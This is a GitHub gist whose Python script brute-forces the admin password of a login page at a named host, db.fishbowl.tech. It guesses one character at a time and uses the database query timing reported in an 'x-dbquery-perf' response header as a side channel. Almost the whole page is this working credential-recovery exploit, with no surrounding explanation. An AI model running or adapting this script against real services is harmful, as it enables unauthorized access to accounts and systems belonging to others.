Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import requests
import time
import sys
import string
import json
def main():
url = 'https://db.fishbowl.tech/login'
form_input = {
'username':'admin',
'password':''
}
char_dictionary = string.printable
num_tries = 2
sleep_seconds = 0.5
current_max = 0
discover_threshhold = 100
output = {}
current_pw = [ # 8 * 4 == 32
'-','-','-','-','-','-','-','-',
'-','-','-','-','-','-','-','-',
'-','-','-','-','-','-','-','-',
'-','-','-','-','-','-','-','-'
]
found_pw = [ # 8 * 4 == 32
'-','-','-','-','-','-','-','-',
'-','-','-','-','-','-','-','-',
'-','-','-','-','-','-','-','-',
'-','-','-','-','-','-','-','-'
]
for i in range(0, len(current_pw)):
for char in char_dictionary:
current_pw[i] = char
current_pw_string = ''.join(current_pw)
tries = []
for current_try in range(num_tries):
# no DOS plskthx
time.sleep(sleep_seconds)
form_input['password'] = current_pw_string
resp = requests.post(url, form_input)
x_dbquery_perf = int(resp.history[0].headers['x-dbquery-perf'][:-2]) # slice 'ms' off
tries.append(x_dbquery_perf)
average = sum(tries) / num_tries
found_pw[i] = char
print(f"Tried: {''.join(found_pw)} => {average}", file=sys.stderr, end='\r')
if discover_threshhold < average:
current_max = average
found_pw[i] = current_pw[i]
print(f"== {''.join(found_pw)}", ' '*10, file=sys.stderr, end='\r')
# reset the pw to reduce next response time
current_pw[i] = '-'
break
print(file=sys.stderr)
print(''.join(found_pw))
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment